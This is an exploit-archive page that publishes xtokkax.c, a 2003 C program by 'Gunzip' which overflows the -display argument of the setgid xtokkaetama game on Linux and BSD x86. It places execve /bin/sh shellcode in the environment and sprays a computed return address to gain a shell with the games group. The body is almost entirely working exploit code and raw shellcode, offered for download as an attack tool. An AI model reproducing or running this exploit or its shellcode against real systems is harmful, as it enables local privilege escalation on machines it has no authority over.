exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xtokkax.c

xtokkax.c
Posted Aug 5, 2003
Authored by Gunzip

Linux and BSD x86 local exploit for xtokkaetama that gives egid of games.

tags | exploit, x86, local
systems | linux, bsd
SHA-256 | b520af024cb9003b4e1a42a73b3409332209fffab5a67095c1e394f14a9b173b

xtokkax.c

Change Mirror Download
/*
** Linux/BSD x86 exploit vs xtokkaetama (c) gunzip
** I don't think you can do something nasty
** with egid=games however (so this is mostly useless)
** just written with the idea to make expl targetless.
** mostly ripped from gera's paper about bof :-o
** https://members.xoom.it/gunzip/
** gunzip@ircnet <techieone@softhome.net>
**
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

#define SIZE 20
#define PATH "/usr/games/xtokkaetama"

unsigned long STACKBASE()
{
__asm__ ( "movl %esp, %eax" );
}

/**
** linux and bsd execve shellcode by me
**/
unsigned char shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\x52\x51\x53\x54"
"\x8c\xe0\x85\xc0\x75\x04\xb0\x0b"
"\xeb\x02\xb0\x3b\xcd\x80";

int main( int argc, char *argv[] )
{
unsigned long i, ret ;
unsigned char buf[ SIZE + 1 ],
* env[]= { shellcode, NULL },
* run[]= { PATH, "-display", buf, NULL };

ret = ( ( STACKBASE() & 0xffff0000 ) | 0xfffa )
- strlen(PATH) - strlen(shellcode) ;

memset( buf, 0, sizeof(buf) );

for( i = 0; i < sizeof(buf) - 4; i += 4 )
*(unsigned long *)&buf[i] = ret;

if( execve( run[0], (char **)run, (char **)env ) ) {
perror( "execve" );
exit( -1 );
}
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close